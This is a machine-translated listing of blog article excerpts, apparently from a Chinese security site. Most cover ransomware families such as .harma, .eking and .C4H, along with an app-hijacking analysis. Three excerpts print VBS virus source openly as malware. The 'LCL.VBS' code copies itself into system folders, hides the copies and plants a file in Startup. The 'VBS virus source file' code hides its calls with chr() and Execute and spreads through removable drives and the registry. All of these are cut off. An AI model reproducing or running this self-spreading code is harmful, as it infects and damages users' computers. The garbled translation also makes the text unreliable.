• I’ve been battered by bundled software all night


    Last month just pay, whim, think the computer has been used for so many years, or change a notebook!If you want to change it, you can change it. But as a programmer, the most troublesome thing is to set up the environment and install all kinds of software. This is not, in order to install […]

  • How to crack the file suffixes. Cc1h,. Cc2h,. Cc3h,. Cc4h,. Cc5h?


      What is?.CC1H,.CC2H,.CC3H,.CC4H,.CC5HPostfix blackmail virus? Type: encryption virus, data lock, blackmail virusExtension: cc1h,. Cc2h,. Cc3h,. Cc4h,. Cc5hSymptom: the stored file becomes inaccessible and its file name is renamed. A message asking for a ransom appears on the desktop. Internet scammers demand ransom for decryption of documents.Distribution method: infected email attachment,Torrent website and malicious advertisingDamage: password […]

  • How to deal with the recently emerged large-scale infection of. Eking suffix blackmail virus?


      Recently, a number of companies came to me for consultation, and their servers wereIt’s infected. eking suffix extortion virus, after poisoning, all files on the server are encrypted and locked, unable to be opened and used normally, and the file name is also tampered with. Eking suffix, resulting in the company’s business can not […]

  • How to deal with the blackmail virus with. Harma suffix in the enterprise server?


      What is?HarmaBlackmail virus? name Harma virus Threat types Blackmail virus, encryption virus, file cabinet Encrypted file extension . harma (the blackmail virus also appends the victim‘s unique ID and developer’s email address to the file name). Test name Avast(Win32:RansomX-gen [Ransom]),BitDefender( Trojan.Ransom.Crysis .E),ESET-NOD32(Win32 / Filecoder.Crysis P), Trojan- Ransom.Win32 . Crusis.to ), full detection list (VirusTotal) […]

  • MIT black Technology: detection of new coronavirus infection through cough data recorded by mobile phone


    Although the new coronavirus is not as powerful as SARS in 2002, its terrible feature is that it has been latent for a long time without symptoms, which makes the infected people spread the virus without knowing it. If there is no strong means of prevention, the spread of the virus is almost impossible to […]

  • How to decrypt the blackmail virus file with the suffix of. Pizhou?


      What is?.PizhonBlackmail virus? name Pizhon virus Threat types Blackmail virus, encryption virus, file cabinet Encrypted file extension . Pizhou with a random string of characters Test name Avast(Win64:Trojan-gen),BitDefender(Gen: Heur.Ransom.REntS 1), eset-nod32 (win64 / filecoder. O), HEUR: Trojan- Ransom.Win32 .Crypmod。 VHO), complete detection list (VirusTotal) Symptoms The file stored on the computer cannot be opened […]

  • One of the VBS virus making is to copy its own vbs script


    Copy itself to disk C huan.vbsASP / visual basic code Copy codeThe code is as follows: set copy1=createobject(“scripting.filesystemobject”)          copy1.getfile(wscript.scriptfullname).copy(“c:\huan.vbs”)   

  • Blackmail virus file suffix. C1h how to deal with? Can c1h blackmail virus data be recovered?


      What is?C1HBlackmail virus? C1h virus is a very notorious and harmful blackmail software infection. It can easily change the security of Windows PC and enter the computer. It’s not easy to detect this suspicious threat, but you can easily find its symptoms. Once on the computer, c1h ransomware encrypts all files on your PC […]

  • What is the decryption method to conquer the. C4H suffix blackmail virus?


      What is?C4HBlackmail virus? name C4H virus Threat types Blackmail virus, encryption virus, file cabinet. Encrypted file extension .C4H Test name Avast(Win32:Malware-gen),BitDefender( Generic.Ransom.GlobeImposter .9F3AF8D),ESET-NOD32(Win32 / Filecoder.FV (HEUR: 1 Trojan.Win32 . generic), a complete list of tests(VirusTotal)。 Symptoms The file stored on the computer cannot be opened because the previous feature file now has a different […]

  • How has your app been replaced? Analysis of APP hijacking virus


    1、 Introduction of APP hijacking virus App hijacking refers to the redirection of execution process, which can be divided into activity hijacking, installation hijacking, traffic hijacking, function execution hijacking, etc. This paper will analyze the recent hijacking and installation hijacking viruses using activity. 2、 Analysis of activity hijacking virus 2.1 introduction to activity hijacking virus […]

  • LCL.VBS Virus source code


    rem email:[email protected] some crack statement i remment,make it can’t to runon error resume next dim title,text title=”can you help me find a person?” text=”her name is Liu Chun li.”&chr(13)&chr(10) text=text&”her birthday is 1981-01-23.”&chr(13)&chr(10) text=text&”her mother home is Yuzhen.Qixian.Kaifeng.Henan.China.”&chr(13)&chr(10) text=text&”I was died because by her,”&chr(13)&chr(10) text=text&”I am demanding my life of you.”&chr(13)&chr(10) Set fso = CreateObject(“Scripting”&”.”&”FileSystem”&”Object”) self=fso.opentextfile(wscript.scriptfullname,1).readall  set WshShell = WScript.CreateObject(“WScript”&”.”&”Shell”) Startup = WshShell.SpecialFolders(“Startup”) Set dirwin = fso.GetSpecialFolder(0)  Set dirsystem = fso.GetSpecialFolder(1)  Set dirtemp = fso.GetSpecialFolder(2)  Set lcl=fso.GetFile(WScript.ScriptFullName)  lcl.Copy(dirwin&”\lcl.vbs”)  lcl.Copy(dirsystem&”\lcl.vbs”)  fso.getfile(dirwin&”\lcl.vbs”).attributes=7 fso.getfile(dirsystem&”\lcl.vbs”).attributes=7 set sf0 = fso.GetSpecialFolder(0) b = sf0.drive&”\lcl.txt” Set lcl = fso.CreateTextFile( b , True ) lcl.Write text fso.CopyFile b, Startup&”\lcl.txt” lcl.Close dim lcl Set lcl = fso.CreateTextFile(wscript.scriptfullname, True) Function scode (N)     dim x     for x = 0 to 254        if n = chr(x) then            scode = x           exit function        end if     next end function Read line and other methods are used to […]

  • VBS virus source file


    rem vbs.rhl Dim fs,r,ss,w,reg,regpath,dvbs ddd=”Set fs =” &chr(67) & “reate” & “Obj” & chr(101) & “c” & chr(116) & chr(40) & chr(34) & “Scrip” & chr(116) & “ing.File” & chr(83) & “yste” &chr(109) & chr(79) & “bject” & chr(34) & chr(41) Execute ddd rrr=”set r =” &chr(119) & “scri” & “pt.” &chr(67) & “reate” & “Obj” & chr(101) & “c” & chr(116) & chr(40) & chr(34) & chr(119) & “scri” & “pt.” &chr(115) & “he” & chr(108) & chr(108) & chr(34) & chr(41) Execute rrr sss=”fs.” & chr(103) &”etfil” & chr(101) & chr(40) &chr(119) & “scri” & “pt.” & “scri” & chr(112) & “tfull” &chr(110) & “ame” & chr(41) ttt=”set dvbs =” & sss Execute ttt r.run (fs.GetSpecialFolder(0)&”\explorer.exe .\”) main()  On Error Resume Next sub main() regtime() finddrive() countdrive(ss) regwrite() ganranfile(ss) xunhuan() end sub    Function finddrive()  if dvbs.name=”USBDRIVE.dll” then regwrite() ganrandisk() end if if dvbs.name<>”autorun.vbs” and dvbs.name<>”USBDRIVE.dll” then regwrite() dvbs.delete(true) end if ss=Trim(“”) Set dc = fs.Drives For Each d In dc If d.DriveType = 1 or d.DriveType= 2 and d.IsReady Then  ss = ss & d.DriveLetter  end if Next ss = StrReverse(LCase(Trim(ss)))  end Function Function countdrive(ss) On Error Resume Next dim x For i = 1 To Len(ss)  x = Mid(ss, i, 1)  if x=”” then x=Mid(ss, 1, 1) i=1 end if Set w = fs.GetDrive(x) ganrandiskroot() Next end Function Function ganrandiskroot() dim c,s,f,vbc,ts,runreg On Error Resume Next If w.DriveType=2 or w.DriveType=1 and w.IsReady Then […]